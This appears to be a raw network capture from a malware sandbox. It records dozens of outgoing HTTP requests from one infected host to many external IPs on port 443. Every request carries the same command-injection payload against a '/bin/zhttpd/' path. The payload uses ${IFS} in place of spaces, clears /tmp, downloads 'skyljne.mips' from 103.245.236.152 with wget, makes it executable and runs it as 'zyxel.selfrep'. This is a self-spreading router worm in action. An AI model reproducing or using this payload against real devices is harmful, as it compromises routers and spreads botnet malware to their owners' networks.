                                            Jan 14, 2024 15:50:25.186769009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            552192.168.2.2358278167.35.181.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186793089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            553192.168.2.233944485.59.154.0443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186830997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            554192.168.2.2346800163.183.222.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186856031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            555192.168.2.2339192115.123.246.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186899900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            556192.168.2.2338382193.130.229.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186912060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            557192.168.2.2337972115.43.2.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186939955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            558192.168.2.236063484.193.218.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.186964989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            559192.168.2.234791424.83.38.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187028885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            560192.168.2.2336338199.70.240.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187061071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            561192.168.2.2333212154.237.198.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187082052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            562192.168.2.2352290131.94.216.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187119961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            563192.168.2.2356258203.60.120.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187148094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            564192.168.2.2336256166.169.25.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187171936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            565192.168.2.233889284.66.182.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187200069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            566192.168.2.2341910144.239.242.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187222958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            567192.168.2.236086087.108.206.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187252998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            568192.168.2.234680268.46.204.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187287092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            569192.168.2.2347852201.165.165.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187369108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            570192.168.2.23552909.70.167.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187396049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            571192.168.2.2353950106.80.187.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187398911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            572192.168.2.2334292174.186.178.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187398911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            573192.168.2.2353276187.46.7.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187403917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            574192.168.2.235368068.144.107.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187441111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            575192.168.2.2356622166.136.100.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187474012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            576192.168.2.233593295.17.7.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187501907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            577192.168.2.2357220158.110.66.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187561989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            578192.168.2.2351832203.153.98.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187588930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            579192.168.2.234792032.108.125.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187608957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            580192.168.2.2337114107.251.235.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187638998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            581192.168.2.233631045.89.185.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187673092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            582192.168.2.233692092.22.114.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187700987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            583192.168.2.233451489.34.31.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187719107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            584192.168.2.2342118129.1.34.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187746048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            585192.168.2.2332932131.140.203.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187777042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            586192.168.2.2333296110.221.54.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187812090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            587192.168.2.2360534141.77.18.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187836885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            588192.168.2.2347980160.240.227.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187871933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            589192.168.2.234320894.114.255.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187920094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            590192.168.2.234440824.233.79.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187920094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            591192.168.2.2334636163.83.47.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187946081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            592192.168.2.2342278112.193.129.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.187990904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            593192.168.2.236073659.192.110.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188019037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            594192.168.2.2333064203.137.239.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188059092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            595192.168.2.233855223.195.240.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188097000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            596192.168.2.2348912185.220.221.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188114882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            597192.168.2.2346750135.25.43.183443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188153982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            598192.168.2.234957295.5.251.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188173056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            599192.168.2.2353568177.83.219.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188196898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            600192.168.2.2359058147.50.170.59443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188220024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            601192.168.2.234663612.177.170.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188261986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            602192.168.2.2339728151.180.93.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188311100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            603192.168.2.2350244167.55.129.2443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188318014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            604192.168.2.235119287.212.195.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188345909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            605192.168.2.2348798134.49.9.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188380003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            606192.168.2.234411674.243.141.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188420057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            607192.168.2.2332996140.170.80.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188431978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            608192.168.2.234654282.43.130.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188474894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            609192.168.2.2340660153.125.222.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188493013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            610192.168.2.2360368147.116.183.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188508987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            611192.168.2.2332912121.12.49.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188575983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            612192.168.2.234803087.147.192.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188584089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            613192.168.2.2356604100.217.194.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.188627958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            614192.168.2.2337882109.150.4.250443
                                            TimestampBytes transferredDirectionData
